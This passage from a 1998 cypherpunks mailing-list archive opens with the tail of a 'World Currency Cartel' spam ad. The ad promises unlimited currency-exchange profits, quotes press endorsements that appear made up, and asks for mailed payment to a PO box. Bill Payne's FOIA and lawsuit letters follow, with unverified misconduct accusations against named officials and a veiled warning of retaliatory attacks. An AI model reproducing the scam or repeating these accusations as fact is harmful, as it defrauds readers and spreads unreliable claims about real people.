 INTO $588 AS MANY TIMES AS YOU WANT'. That means, you will be able 
 to EXCHANGE $99, AMERICAN LEGAL CURRENCY DOLLARS, FOR $580 OF THE 
 SAME. You can do this as many times as you wish, every day, every 
 week, every month. All very LEGAL and effortlessly!
 
 It takes only 5 to 10 minutes each time you do this. You can do 
 this from home, office or even while traveling. All you need is 
 an access to a phone line and an address. Best of all, you can do 
 this from ANY CITY ON THIS EARTH!!!
 
 Again, we must reiterate, anyone can do this and the source is 
 NEVER-ENDING. For as long as the global financial community 
 continues to use different currencies with varying exchange rates, 
 the "SECRET FLAW" will exist.
 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 >>>>>>>>>>>>>>>>>>
 As we said earlier , we will do the first transaction for you and 
 will show you exactly how to do this on your own, over and over 
 again!
 
 The amount of exchange you would do each time is entirely up to 
 you. Working just 2 to 10 hours a week, you can soon join the list 
 of Millionaires who do this on a daily basis many times a day. The 
 transaction is so simple that even a high school kid can do it!
 
 We at the World Currency Cartel would like to see a uniform global 
 currency backed by Gold. But, until then, we will allow a LIMITED 
 number of individuals worldwide to share in the UNLIMITED PROFITS 
 provided for by the world currency differentials.
 
 We will espouse no more political views nor will we ask you to do 
 so. We can say however, that our parent organization, NDML, 
 benefits greatly by the knowledge being shared, as we 
 ourselves, along with YOU, benefit likewise. Your main concern 
 surely will be, how you will benefit.
 
 As soon as you become a member, you will make transactions from 
 your home, office, by telephone or through the mail. You can 
 conduct these transactions even while traveling.
 
 Don't believe us? Experience it for yourself!
 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
 Unlike anyone else, we will assure you great financial freedom and 
 you will add to our quickly growing base of supporters and join 
 the list of MILLIONAIRES being created using this very "SECRET 
 FLAW" in the world currency market.
 ******************************************************************
 ******************************************************************
 ***
 
 DON'T ENVY US, JOIN US TODAY!!!
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 '''''''''
 There is a one time membership fee of only $195. BUT, if you join 
 us by June 9, 1998 date, you can join us for only $25 administrative 
 cost. Your  important documents, instructions, contact name/address, 
 phone number and all other pertinent information will be mailed to 
 you  immediately. So take advantage of our Anniversary date and join 
 us today.
 
 (If you are replying after June 9, you must pay $195.00 for 
 the membership fee. NO EXCEPTIONS, and no more E-mail inquiries 
 please).
 
 Upon becoming a member, you promise to keep all infos 
 CONFIDENTIAL!
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~~~~~~~~~~~~~~~~~
 Should you choose to cancel your membership for any reason, you 
 must return all papers/documents for a refund within 60 days.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~~~~~~~~~~~~~~~~~
 
 IMPORTANT:
 ****************
 
 1...Please write your name & mailing address VERY CLEARLY on a 
 paper
 2...Below your mailing address, please write your E-mail address 
 (optional)
 3...At the top left hand corner, please write the words "NEW 
 MEMBER"
 4...Attach a CHECK or MONEY ORDER for $25 + $3 for the shipping of 
 documents (TOTAL = $28.00) PAYABLE TO      
      "NDML" and mail to:
 
                NDML
                PO BOX 311
                MILFORD, NJ 08848

*If outside US add an additional $10 (TOTAL + $38.00)
 
 }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
 }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
 }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
 
 Here are some more 'Editorial Excerpts':
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 WALL STREET: "A discreet group of Americans, operating under the 
 guise of World Currency Cartel have recently begun making rumbles in 
 world finance market. While at this time, their game is not completely 
 known, they certainly will be watched by those making major moves in the 
 currency contracts".
 
 FINANCIAL WEEK: "Watch them, monitor them, extract their knowledge 
 and try to become one of them. That is the soundest financial 
 advice we could give to anyone".
 
 NATIONAL BUSINESS WEEKLY: "While this reporter has been left in 
 the cold as to its method of operation, we have been able to 
 confirm that 'World Currency Cartel' and its members are literally 
 amassing great fortunes overnight".
 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$END$$$$$$$$$$$$$$$$$$
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 We thankfully credit DIAMOND INT. for the content of this 
 IMPORTANT ANNOUNCEMENT.
 
 
 
 
  >>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 15 May 1998 06:58:08 -0700 (PDT)
To: lawya@lucs-01.novell.leeds.ac.uk
Subject: Ruby Ridge and jury trial
Message-ID: <355C479A.28DD@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 5/15/98 7:17 AM	

J Orlin Grabbe
John Young

ABQ J 5/15/98

 Charges Dismissed in Ruby Ridge Case
  BOISE, Idaho  -  A federal judge on Thursday dismissed an involuntary
manslaughter
  charge against an FBI sharpshooter for the death of white separatist
Randy Weaver's
  wife during the siege at Ruby Ridge.
    U.S. District Judge Edward Lodge ruled that Lon Horiuchi was acting
within the 
  scope of his authority and was honestly discharging his duties when he
fired the shot
  that killed Vicki Weaver on Aug. 22, 1992.
    The U.S. Justice Department decided in 1994 against prosecuting
Horiuchi, or any of
  his FBI superiors and reaffirmed the decision last year.

1  It was NOT a jury which made the determination Horiuchi was acting
within the scope
   of his authority, but a FEDERAL JUDGE.
2  The Justice Department did not prosecute FBI agents

  FASCISM -   a political and economic movement, strongly nationalistic,
magnifying the rights
  of the state as opposed to those of the individual, in which industry,
though remaining largely 
  under private ownership, and all administrative political units, are
controlled by a strong central     
  government.

Morales and I were unable to meet on Thursday.  Today we will study the
docket sheets view at
http://www.jya.com/whp-10usca.htm today.  And open the letter I received
from EEOC Inspector
General Office.

The above Ruby Ridge article emphasizes the importance of a jury trial
in matters of federal 
government misconduct.  http://www.jya.com/whp043098.htm

This matter should get settled before it gets WORSE.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian <brjones@ucsd.edu>
Date: Fri, 15 May 1998 07:47:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <355C576B.184D@ucsd.edu>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 15 May 1998 14:53:29 -0700 (PDT)
To: federico pena <" Federico.F.Pena"@hq.doe.gov>, Thomas.Mann@hq.doe.gov
Subject: FOIA appeal, again
Message-ID: <355CB7C1.25A@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 5/15/98 2:55 PM

E-mail Federico.F.Pena@hq.doe.gov and mail

Federico F. Pena
The Secretary of Energy
United States Department of Energy
Washington, D.C. 20585

Dear Secretary Pena:

Purposes of this letter are to

 1 protest an improper Freedom of Information Act dismissal by
Thomas O. Mann , Deputy Director, Office of Hearings and Appeals
Thomas.Mann@hq.doe.gov

2 appeal a denial of a Freedom of Information Act (FOIA) Request.

I attach a copy of my 3/10/98 appeal letter to you.

DOE/ALOO failed to respond with time allotted by law to my FOIA request,
as you can read in my appeal letter.

On March 30, 1998 Barfield finally did respond.  But late.

APR 28 Mann writes me,

  We learned that AOO issued a determination concerning your request on
March
  30, 1998.  Because your appeal was based on the Department's failure
to respond,
  and because the Department has responded you appeal is now moot.

I follow the law.

If Mann feels that there is law or federal regulation to support is
claim that the
time-out clause in the FOIA no longer applies because of a late agency
response,
then he should report this to you. 

Mann adds in the final paragraph of his APR 28 letter

  Accordingly, the appeal dated march 10, 1998, that you filed under the
Freedom of
  Information Act, is hereby dismissed.

My appeal is not, as Mann concluded, moot.  My appeal is active.

Mann, however, writes

  You may, however, file an appeal with the Office based on the March 30
determination.

Man also writes

  Please note that, as stated in the determination letter, appeals under
the Freedom of
  Information Act should be addressed to the Director of the Office of
Hearings and Appeals.

And Barfield writes

  Such an appeal must be made in writing within 30 calendar days after
receipt of this letter,
  addressed to the Director, Office of Hearing and Appeals, ...

Secretary Pena, your employees are apparently trying to invent their own
FOIA rules instead
of complying with federal law.

  Whenever a FOIA request is denied, the agency must inform
  the requester of the reasons for the denial and the requester's
  right to appeal the denial to the head of the agency.

I am appealing to you, not
http://www.hr.doe.gov/htbin/callup?name=breznay&SYNONYM=YES,
George.Breznay@hq.doe.gov

I ask that your office takes WRITTEN corrective action to educate or
perhaps reprimand
both Mann and Barfield for not following the law.

Barfield writes in her Mar 30 letter

  The Kirtland Area Office (KAO), oversight for the Sandia National
Laboratories (SNL),
  conducted a search but could not locate any responsive documents.  The
KAO also made
  the determination that the documents you are seeking are contained in
procurement files
  in possession and control of SNL and are, therefore, not "agency
records" subject to
  provision of the FOIA.

Secretary Pena, Barfield's statement appears to be an attempt for
bureaucrats to hide,
perhaps in the case of RSA and VP Al Gore, possibly incriminating
records from the public.

Therefore, I assert that the requested documents are or should be part
of DOE agency documents,
if DOE is doing a proper job of managing its contractors.

Therefore, I add this clause to my previous appeal.  And ask that your
respond within the
time limit allowed you by law.

Of course, I continue to feel that we should settle this unfortunate
matter seen on Internet
at

http://www.jya.com/whp050898.htm
http://www.jya.com/whp-10usca.htm
http://www.jya.com/whp043098.htm
http://www.jya.com/mf050998.htm
http://jya.com/whpfiles.htm
http://www.jya.com/crack-a5.htm
http://caq.com/cryptogate
http://www.aci.net/kalliste/speccoll.htm
http://www.aci.net/kalliste/nukearse.htm

before it gets even more serious and eventually costly to the taxpayer.

Sincerely,



William H. Payne 
13015 Calle de Sandias 
Albuquerque, NM 87111


Tuesesday 3/10/98 8:10 PM

E-mail Federico.F.Pena@hq.doe.gov and mail

Federico F. Pena
The Secretary of Energy
United States Department of Energy
Washington, D.C. 20585

Dear Secretary Pena:

Purpose of this letter is to appeal a denial of a Freedom of 
Information Act (FOIA) Request.

I wrote on Tuesday February 17, 1999 15:11

  e-mail and mail

  Ms. Elva Barfield
  Freedom of Information Office
  U. S. Department of Energy
  Albuquerque Operations Office/OIEA
  POB 5400
  Albuquerque, NM 87185-5400
  EBARFIELD@DOEAL.GOV

  Dear Ms. Barfield:

  VP Al Gore is in the crypto business.

    Information SuperSpyWay 
    Al Gore Approved
    Encryption for China
    in Return for
    Campaign Donations
    by Charles R. Smith

  Portions of the above document posted on Internet at 
  http://www.us.net/softwar/ and  http://www.aci.net/kalliste/ 
  states

  1.	Gore charged with encryption policy according to PDD-5 and 
              PRD-27 on April 16, 1993. 

  2.	Government officials represent themselves on Al Gore's behalf for 
      RSA patent purchase negotiations in Feb. 1994. 
  3.	RSA chairman Bidzos meets with Chinese officials at the same 
      time as Ron Brown in Oct. 1995. 

  4.	RSA Chairman Bidzos enters into merger negotiations with Security 
	Dynamics, a company backed by Sanford Robertson, in Nov. 1995. 

  5.	VP Gore calls Sanford Robertson from the White House for a 
      donation in Nov. 1995. 

  6.	Robertson delivers $100,000 donation ($80,000 soft - $20,000 
	directly into the Clinton/Gore campaign) in Jan. 1996. 
  7.	RSA signs deal with China in Feb. 1996. The administration 
	previously prosecuted similar deals but this time does nothing. 
  8.	Justice Dept. approves RSA merger with Security Dynamics in 
	April 1996 for $280 million dollars, netting Sanford Robertson's 
	company a cool $2 million just to write the deal. 



  In 1991 I was in involved with Sandia National Laboratories
  Comprehensive Test Ban Treaty seismic data authenticator.

  At that time Sandia director Tommy A Sellers had assumed 
  responsibility for directorship from Robert Clem.

  Sandia supervisor Tom Wright replaced my supervisor, John Holovka, 
  who was the supervisor for the CTBT seismic data authenticator.

  Wright brought in Ph.D. Steven Goldsmith to supervise me.

  Sellars, Wright, and Goldsmith were new to crypto-type projects.

  Much of this is documented at http://www.jya.com/whp021598.htm.

  This is evidenced by Sellar's attached SEP 24 1991 memorandum,
  which Goldsmith help author, addressed to Dr James J Hearn at 
  the National Security Agency.

  The SEP 24 memorandum contained a number of technical errors.

  I corrected these errors in my attached December 20, 1991 memorandum.

  Department of Energy and it predecessors have a well-documented
  history of not requiring technical expertise for pursuit of interests.

  Stewart Udall, The Myths of August, writes,

      Any cover-up must be implemented and enforced by designated
    agents, and one man emerged in 1953 as the quarterback of the 
    AEC's damage-control effort.  His name was Gordon Dunning.
    Although the personnel charts of the 1950s list him as a low-level 
    "rad-safe" official in the Division of Biology and Medicine,           
    documents demonstrate that he was clothed with authority to    
    manage and suppress information about the radiation released
    by the testing of nuclear weapons. ...

  About the time Sellers and Sandia Ombudsman gave me a directed
  transfer to break electronic locks for the FBI/ERF [engineering
  research facility], Goldsmith and Wright, certainly with the approval
  of Sellers, placed a contract with RSA Inc [http://www.rsa.com/], 
  I was told.

  Ms Barfield, we think the American public needs to know more about
  RSA's work with Sandia National Laboratories.

  Therefore, Under the provision of the Freedom of Information Act, 
  5 USC 552, I am requesting access to: 

    1 ALL purchase requisitions, including any attached statement of
       work, issued by Sandia National Laboratories, Los Alamos     
       National Laboratories, or DOE/ALOO between January 1, 1991
       and February 17, 1998 to RSA Inc.

    2  Copies of all invoices from RSA Inc received by Sandia National   
        Laboratories, Los Alamos National Laboratories, or DOE/ALOO 
        between January 1, 1991  and February 17, 1998

  If there are any fees for searching for, or copying, the records 
  I have requested, please inform me before you fill the request.

  As you know, the Act permits you to reduce or waive the fees 
  when the release of the information is considered as "primarily 
  benefiting the public."  I believe that this requests fits that 
  category and I therefore ask that you waive any fees.

  Your office agreed to waive fees before.  This request is surely 
  of "public interest."

  December 13, 1994 DOE/AL FOIA officer Gwen Schreiner waived fees
  for the reason,

        "We have considered your request and have determined that
        release of the requested records is in the public interest,
        that disclosure of this information is likely to contribute
        significantly to public understanding of the operations or
        activities of the government, that you or the organization
        you represent have little or no commercial interest in the
        material contained in the records, that you or the
        organization you represent have the qualifications and
        ability to use and disseminate the information, and that the
        records are not currently in the public domain.  A waiver of
        fees is therefore granted."

  This waiver of fees was, undoubtedly, issued as a result of former
  Energy Secretary Hazel O'Leary's Openness initiative.

  Heart of America paid my way to hear Secretary O'Leary's celebrated
  whistleblower speech.

  If all or any part of this request is denied, please cite the 
  specific exemption(s) which you think justifies your refusal to 
  release the information and inform me of your agency's 
  administrative appeal procedures available to me under the law.

  I would appreciate your handling this request as quickly as 
  possible, and I look forward to hearing from you within 20 
  working days, as the law stipulates.

I received no response to the above FOIA. 

Therefore I appeal as a result of non-response.

As you may be aware

      (6)(A) Each agency, upon any request for records made under  
       paragraph (1), (2), or (3) of this subsection, shall--
            (i) determine within ten days \1\ (excepting
        Saturdays, Sundays, and legal public holidays) after
        the receipt of any such request whether to comply with
        such request and shall immediately notify the person
        making such request of such determination and the
        reasons therefor, and of the right of such person to
        appeal to the head of the agency any adverse
        determination; and

And you may also be aware

  -------------------------------------------------------------------------
      \1\ Under section 12(b) of the Electronic Freedom of Information
  Act Amendments of 1996 (Pub. L. 104-231; 110 Stat. 3054), the amendment
  made by section 8(b) of such Act striking ``ten days'' and inserting
  ``20 days'' shall take effect on October 3, 1997.
  -------------------------------------------------------------------------
            (ii) make a determination with respect to any
        appeal within twenty days (excepting Saturdays,
        Sundays, and legal public holidays) after the receipt
        of such appeal. If on appeal the denial of the request
        for records is in whole or in part upheld, the agency
        shall notify the person making such request of the
        provisions for judicial review of that determination
        under paragraph (4) of this subsection

So I expect a response to this appeal within the time allotted to you 
by law.

Much of this unfortunate matter is appearing on Internet.

 http://www.jya.com/whp021598.htm

 http://www.jya.com/cylinked.htm

 Letter from Bill Payne Regarding Cryptography at Sandia
 http://www.aci.net/kalliste/

 Crypto AG: The NSA's Trojan Whore?
 http://caq.com/CAQ/caq63/caq63madsen.html
  
 NSA, Crypto AG, and the Iraq-Iran War
 http://www.aci.net/kalliste/speccoll.htm

 How Secure is America's Nuclear Arsenal?
 http://www.aci.net/kalliste/nukearse.htm

And, of course, we continue to seek settlement.

Sincerely,



William H. Payne 
13015 Calle de Sandias 
Albuquerque, NM 87111 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 15 May 1998 15:40:26 -0700 (PDT)
To: ray kammer <" kammer"@nist.gov>, lawya@lucs-01.novell.leeds.ac.uk
Subject: foia fee denial appeal and settlement letter
Message-ID: <355CC320.2CC1@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 5/15/98 3:48 PM

By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF

Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  appeal a FOIA fee waiver denial.
2  continue to explore settlement possibilities of our current 
lawsuit.

30 March Joann H. Grube, Deputy Director of Policy, NSA, wrote
in response to my Friday February 27, 1998 attached letter to you

  There are 706 cases ahead of your in our processing queue. ..

  Please be advised that your request for a waiver of fees has been
  denied.

Public knowledge of how much taxpayer NSA has likely squandered 
ATTEMPTING to build public key crypto chips certainly in
the public interest.

Therefore, I appeal Grube's denial.

Grube wrote

  Any person notified on an adverse determination may, within 60
  days after notification of the determination, file an appeal to the
  NSA/CSS Freedom of Information Act Appeal Authority.  The
  appeal shall be in writing and addressed to the NSA/CSS FOIA 
  Appeal Authority, ...

General Minihan,  Grube apparently is attempting to invent her
own FOIA appeal rules instead of follow federal law.  

  Whenever a FOIA request is denied, the agency must inform
  the requester of the reasons for the denial and the requester's
  right to appeal the denial to the head of the agency.

I ask that you educate and possibly reprimand Grube for her failure
to properly state law.

As you may be aware

      (6)(A) Each agency, upon any request for records made under  
       paragraph (1), (2), or (3) of this subsection, shall--
        (i) determine within ten days \1\ (excepting
        Saturdays, Sundays, and legal public holidays) after
        the receipt of any such request whether to comply with
        such request and shall immediately notify the person
        making such request of such determination and the
        reasons therefor, and of the right of such person to
        appeal to the head of the agency any adverse
        determination; and

And you may also be aware

 
-------------------------------------------------------------------------
      \1\ Under section 12(b) of the Electronic Freedom of Information
  Act Amendments of 1996 (Pub. L. 104-231; 110 Stat. 3054), the
amendment
  made by section 8(b) of such Act striking ``ten days'' and inserting
  ``20 days'' shall take effect on October 3, 1997.
 
-------------------------------------------------------------------------
            (ii) make a determination with respect to any
        appeal within twenty days (excepting Saturdays,
        Sundays, and legal public holidays) after the receipt
        of such appeal. If on appeal the denial of the request
        for records is in whole or in part upheld, the agency
        shall notify the person making such request of the
        provisions for judicial review of that determination
        under paragraph (4) of this subsection

So I expect a response to this appeal within the time allotted to you 
by law.

Our lawsuit has attracted international attention on Internet.

http://www.jya.com/whp050898.htm
http://www.jya.com/whp-10usca.htm
http://www.jya.com/whp043098.htm
http://www.jya.com/mf050998.htm
http://jya.com/whpfiles.htm
http://www.jya.com/crack-a5.htm
http://caq.com/cryptogate
http://www.aci.net/kalliste/speccoll.htm
http://www.aci.net/kalliste/nukearse.htm

Partially, perhaps, as the result of the about .5 million dead Iranian
Shiite Muslims.
Or maybe judicial misconduct?

Morales and I plan to appeal to the Tenth in event that Morales'
dismissal is upheld.

Further, we feel that YOU must be held accountable.  Therefore we will
appeal your
removal from our lawsuit.

But this is sure to cost the taxpayer much more money.  

And failure to fairly settle these unfortunate matters raises the
possibility of a understandable, or opportunistic, retaliatory attack
for NSA's bungled spy sting on Iran
by the aggrieved or their enemies.  

Innocent people may be harmed.

Both alternatives are unpleasant to think about.

Therefore, Morales and I continue to offer to engage in settlement talks
with YOU.

I cannot find your e-mail address

Therefore I will forward the e-mail copy of this FOIA appeal /settlement
letter to 
Ray Kammer of NIST [http://www.nist.gov so that Kammer can possibly
forward an e-mail to you.

I am not reading e-mail. 

Sincerely,



William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037


Friday February 27, 1998 3:15 PM


By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF

Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

In about 1986 Sandia National Laboratories assigned me the 
task of  design and construction of a Comprehensive Test Ban 
Treaty seismic data authenticator.

In the initial stages of the project, Sandia cryptographer 
Gustavus Simmons attempted to convince both Sandia 
management and NSA employees Tom White, Mark Unkenholtz,
and Ed Georgio that a form of public key authentication should 
replace NSA employee Ronald Benincasa's National Seismic
Station/Unmaned Seismic Observatory 11-bit data authentication
algorithm.

My Sandia supervisor John Holovka and project leader H B [Jim]
Durham ordered me to write a paper explaining public key 
cryptography.

This paper,  RSA ENCRYPTION, along with my SAND report
describing my implementation of Benincasa's algorithm and
filings in our lawsuit, now appear on Internet at
http://www.jya.com/index.htm, click CRYPTOME, then OpEd,
then http://www.jya.com/whprsa.htm.

Sandia explored the merits of switching from Benincasa's
algorithm to a public key-based authentication method suggested
by Simmons.

For Sandia's evaluation of the merits of public key, electronic tagging,
and Bureau of Engraving and Printing projects ,  I bought for Sandia 
samples both the Cylink CY1024 and AT&T A & B two chip sets for
modulo m arithmetic computations.

NSA employee Tom White sent me a copy of the SECRET classified
NSA report on IBM's hardware public key chip FIREFLY.

I wrote in my tutorial paper

  RSA hardware computations

  The slow speed of software RSA computations plus the potential
  wide use prompted several companies to build chips which compute
  modular arithmetic to at least several hundred bits.  Most of
  these chips "cascade" to compute with a larger number of bits.

  Corporations involved in building these chips are

     1  IBM  Firefly

     2  AT&T

     3  Motorola (apparently a three chip set)

     4  Cylink   Pittway-First alert

     5  Sandia Labs (Algorithm M and predecessor chip)

  Details of the IBM chip is classified.  AT&T as of July 1987 has
  not released details of their chip.  Little information is
  available on the Motorola chip set.

  The Cylink chip is commercially available.  Its price dropped
  from $1,500 to $600 each in June 1987.  Data is transferred to
  and from the chip with serial shift register communication.

  The early Sandia chip was limited in speed.  The replacement
  chip is cascadeable, communicates with 8 or 16 bits parallel,
  matches the speed of the Cylink chip, but is not out of
  fabrication.

  Rumors circulate that there is about an order of magnitude
  performance difference between some of these chips.

  These hardware chips improve exponentiation speed about 3 orders
  of magnitude over software implementation benchmarked on an Intel
  8086 family microcomputer.

Whitfield Diffie writes about both the Cylink and Sandia chips.  And
is quoted at  http://www.aci.net/kalliste/nukearse.htm.

Sandia had terrible luck with its public key chips.  

I reported SOME of the troubles to Electronic Engineering Times editor 
Loring Wirbel [http://techweb.cmp.com/eet/823/] on March 23, 1994.

        Dr. John Wisniewski was a supervisor at Sandia's Center for
        Radiation-hardened Microelectronics.  Wisniewski was a graduate
        student at Washington State University in about 1975.  I was a
        professor at WSU.

        Wisniewski knows all about the failing Sandia chips in the nuclear
        arsenal.  I took notes on February 13, 1993.  Wisniewski reviewed
        the problems again for me.

             1    No quality initiative.  Each chip lot had a different
                  process.
             2    Overall yield - 40-50%.  Down to 10% after packaging.
             3    Metalization problems.  No planarization.  No flow of
                  glass.  Couldn't use high temperature.  Step coverage
                  problems.  Layed down over tension.  100% field returns
                  over several years.
             4    Sandia would store lots of parts for replacements.

        Sandia management made the decision to place low yield parts in
        the nuclear arsenal.  Sandia must meet DOD schedules management
        reasoned.  Hundreds of millions spent on CRM.  Sandia must show
        productivity.

        Wisniewski told me that low yield chip test survivors are those   
        whichthe tests failed to detect failures.  Wisniewski will talk.  
        503-625-6408.  Wisniewski now works for Intel in Oregon.  Have 
        Wisniewski tell you about the fire in the CRM clean room!

Sandia supervisor Jerry Allen later told me it cost $300,000 each to remove
Sandia's failing chips at Pantex from a nuclear bomb.

NSA apparently is biased toward hardware implementations of cryptographic
and authentication algorithms.  As opposed to software implementation.

NSA representatives and Sandia management decided not to use a public
key authentication scheme for its CTBT seismic data authenticator because
of all of the problems with implementing public key algorithms.

But NSA surely has spent MUCH MONEY on public key chip implementations.

NSA is promoting its Clipper crypto chips as described at 
http://cpsr.org/dox/clipper.html.

And we get some information about technical specifications of NSA's Clipper
chip at http://www.us.net/softwar/http://www.us.net/softwar/clip.html

  Clipper Chip Information

  MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION  ON A CHIP 

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at 
     programming. 
     Chip ID, family key and device unique key are installed at programming           
     facility and are completely transparent to the user.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

1  Copies of all invoices from

	A   AT&T
	B   Motorola
	C   IBM
	D  Sandia National Laboratories

to NSA for payments for developing ANY public key-related chips between 
January 1, 1980 and February 27, 1998.

2  Copies of all invoices to NSA from ANY corporation involved in 
development
of ANY Clipper chip-related hardware between January 1, 1980 and 
February 27, 1998.

The public has a right to know how much NSA spent on TRYING monoploize the 
crypto business.

If there are any fees for searching for, or copying, the records I have 
requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees when the 
release of the information is considered as "primarily benefiting the 
public."
  
I believe that this requests fits that category and I therefore ask that 
you waive any fees.

If all or any part of this request is denied, please cite the specific 
exemption(s) which you think justifies your refusal to release the information and inform me of your agency's administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as possible, and I 
look forward to hearing from you within 20 working days, as the law stipulates.

With respect to our current FOIA lawsuit, I feel that we should settle this
unfortunate matter.

I see from your biography at  http://www.nsa.gov:8080/ and
http://www.nsa.gov:8080/dirnsa/dirnsa.html that you are

         1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

One of my former M.S. and Ph.D students in Computer Science,
Ted Lewis, is currently the chairman of Computer Science at
Naval Postgraduate School [http://www.friction-free-economy.com/].

Small world.

But I think that this emphasizes that WE SHOULD all be on the same side.
Not engaged in a conflict in US federal court.  Or on Internet.

NSA attempts to withhold requested information are possibly unwise.  

In our wired world the aggrieved know what happened to them.
[http://www.aci.net/kalliste/speccoll.htm]. http://www.wpiran.org/,
http://www.netlink.co.uk/users/impact/namir/namirm.html

And moderates in Iran, [http://persia.org/khatami/biography.html], appear 
want settlement too.

My family and I have been damaged by these crypto wars.

I ask you that consider fair settlement of damages caused by the National
Security Agency.

I cannot find your e-mail address on Internet.

Therefore I will forward the e-mail copy of this FOIA/settlement letter to 
Ray Kammer of NIST [http://www.nist.gov/], who along with the FBI 
[http://www.fbi.gov/, http://www.fbi.gov/fo/nyfo/nytwa.htmand], and NSA 
are trying to control the crypto business so that Kammer can possibly
forward an e-mail copy of the FOIA/Settlement letter to you.

Sincerely,

bill

William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 [I am not reading e-mail]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 15 May 1998 16:48:39 -0700 (PDT)
To: grassley <chuck_grassley@grassley.senate.gov>
Subject: Government misconduct
Message-ID: <355CD34C.75E8@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 5/15/98 5:36 PM

Senator Grassley

I sent you a copy of the criminal complaint affidavit I sent to judge
Hug.

Our NSA lawsuit was mostly done as practice for an upcoming Privacy Act
violation/defamation lawsuit.

John Young kindly posted 

greene.htm         National Security Abuse: Greene v. McElroy       
April 8, 1998

I was NEVER interviewed by Sandia's Disciplinary Review Committee.

The charges made against me are FALSE.

I did nothing wrong.  http://jya.com/whpfiles.htm

Please help get this matter should be settled before it gets worse.

bill payne


Tuesday April 28, 1998 4:05 PM


Tom Spellman
Criminal Investigator
Inspector General
U.S. Equal Employment Opportunity Commission
POB 18858
Washington, D.C. 20036-8858
202-663-4375
800-849-4230

Dear Mr. Spellman:

March 18, 1998 I phoned the Inspector General's hotline.

I filed a verbal criminal Privacy Act violation complaint with Wanda.

Wanda told me you were going to be the investigator.

Monday March 23 you phoned me to leave your office number.

You phoned several days later.

I told you about the false and defaming documents both Sandia National Laboratories and EEOC Phoenix employees Burtner and Larry Trujillo released without my written permission.

You asked that I send you a copy of these documents.

I mailed them to you the same day.

You told me that you had been reading about this case on  Internet at jya.com and aci.net/kalliste.

On April 3 I phoned to inform your office that a criminal complaint affidavit was filed with judge Hug on Monday April 1 naming those involve in the release of the documents and those who did not properly prosecute those involved..

I mailed a copy of the criminal complaint affidavit to you.

I have not heard from you either in writing or by phone since our initial contact.

Therefore, I ask that you write me and tell me about the status of your investigation.

And, of course, I feel that this unfortunate matter should be promptly settled.  I invite settlement negotiations of the civil aspects of this criminal release of documents.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Fri, 15 May 1998 17:50:56 -0700 (PDT)
To: tcmay@got.net
Subject: Re:A 'Nobody' Out From 'Obscura'
Message-ID: <bf6fecae.355ce2a3@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/15/98 7:33:42 PM Central Daylight Time,
mixmaster@remail.obscura.com writes:

<< > Obviously, this is a forgery, it isn't me, my guess is, it's our 'nobody'
-
 
 You're really out of your league here - lost and clueless.  
 
 Get a clue ... and get lost >>

You'd really like that wouldn't you!  Come on, admit it, I'm fun to have
around!  ;-)

Oh, and BTW:  You're failure to deny the (tacit) charge sure looks like a
(tacit) admission that it's true.  I nailed your ass (IMHO.)

Stan




